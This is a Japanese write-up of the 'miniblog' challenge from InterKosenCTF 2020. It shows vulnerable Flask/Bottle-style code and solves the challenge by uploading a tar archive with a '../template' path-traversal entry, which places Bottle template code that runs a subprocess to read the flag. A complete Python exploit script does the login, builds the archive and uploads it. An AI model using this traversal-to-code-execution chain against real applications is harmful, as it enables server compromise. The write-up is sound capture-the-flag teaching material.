# miniblog [InterKosenCTF 2020]
###### tags: `InterKosenCTF2020`
## 概要
ブログが作れるシステム。
ブログのテンプレートにtemplate文字列が使えるが、次のチェックがあるので単にSSTIはできない。
```python
for brace in re.findall(r"{{.*?}}", content):
if not re.match(r"{{!?[a-zA-Z0-9_]+}}", brace):
return abort(400, "forbidden")
```
また、ファイルのアップロードフォームがあり、tarファイルを送れる。
```python
tarpath = 'tmp/{}'.format(uuid4().hex)
attachments_dir = "userdir/{userid}/attachments/".format(userid=users[username]["id"])
attachment.save(tarpath)
try:
tarfile.open(tarpath).extractall(path=attachments_dir)
except (ValueError, RuntimeError):
pass
```
## 解法
ファイルがattachmentsに展開されるが、ここでファイル名を`../template`にしておけばテンプレートを制約なく書き換えられる。
bottleを使っているのでテンプレートがflaskと違うことに注意して、次のように任意コマンド実行できる。
```python
<%
import subprocess
a = subprocess.Popen(["/bin/cat", "/unpredicable_name_flag"], stdout=subprocess.PIPE).stdout.read()
%>
{{a}}
```
あとはこれを`../template`という名前でアップロードする。
```python
import requests
import re
import tarfile
url = "http://localhost:14000"
payload = {'username': 'hoge', 'password': 'hoge'}
r = requests.post(f"{url}/login", data=payload, allow_redirects=False)
cookies = r.cookies
r = requests.get(f"{url}/", cookies=cookies)
uid = re.findall("/posts/([a-f0-9]{32})/", r.text)[0]
with tarfile.open('exploit.tar.gz', 'w:gz') as tar:
tar.add('exploit.tmpl', arcname='../template')
with open('exploit.tar.gz', 'rb') as f:
binary = f.read()
upload = {'attachment': ('exploit.tar.gz', binary, 'application/octet-stream')}
r = requests.post(f"{url}/upload", files=upload, cookies=cookies)
r = requests.get(f"{url}/posts/{uid}/00000000000000000000000000000000", cookies=cookies)
print(r.text)
```
## 修正点
- 他人のファイルを削除できるのでuserdirの実行権限を外す
これやると投稿一覧も見えなくなる?postsとかtitlesに実行権限あれば大丈夫?
## 意見・感想
- 良い問題
- tarbombに対応しているとなおヨシ
Sign in with Wallet
Connect another wallet